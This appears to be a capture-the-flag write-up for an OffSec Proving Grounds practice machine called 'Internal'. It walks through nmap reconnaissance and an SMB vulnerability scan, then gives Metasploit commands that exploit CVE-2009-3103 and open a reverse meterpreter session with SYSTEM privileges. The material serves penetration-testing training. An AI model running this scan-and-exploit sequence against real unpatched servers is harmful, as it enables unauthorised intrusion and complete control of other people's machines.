Open Table of contents

INFO

CTF URL: https://portal.offsec.com/machine/internal-169/overview/details

Machine Type: Windows

IP: 192.168.153.40

Difficulty: Easy

Reconaisance

NMAP

sudo nmap -p- -sS -sC -sV 192.168.153.40 -v --min-rate 10000

PORT      STATE SERVICE            VERSION
53/tcp    open  domain             Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2025-03-28T17:43:26+00:00
| ssl-cert: Subject: commonName=internal
| Issuer: commonName=internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-08-02T02:11:44
| Not valid after:  2025-02-01T02:11:44
| MD5:   ee71:a47e:4f57:4e71:446c:61f1:7146:aa37
|_SHA-1: bb74:a6c1:c430:ecb6:b6c0:9d5b:0621:67ef:29ba:5a5e
|_ssl-date: 2025-03-28T17:43:32+00:00; 0s from scanner time.
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC

There is a SMB Service. And most likely nmap can identify a vulnerability for this old Windows Server.

sudo nmap -p445 -script=smb-vuln\* 192.168.153.40 -v --min-rate 10000
# result
...
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
...

CVE-2009-3103

Using MSF:

msfconsole -q
msf6 > search CVE-2009-3103
msf6 > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
# set options
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lhost 192.168.45.202
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set rhosts 192.168.153.40
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
# exploit
# and the result
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

PG • CTF • Internal • Write-Up

Table of contents

INFO

Reconaisance

NMAP

CVE-2009-3103

Related Posts

PG • CTF • Access • Write-Up

PG • CTF • Heist • Write-Up

PG • CTF • Hutch • Write-Up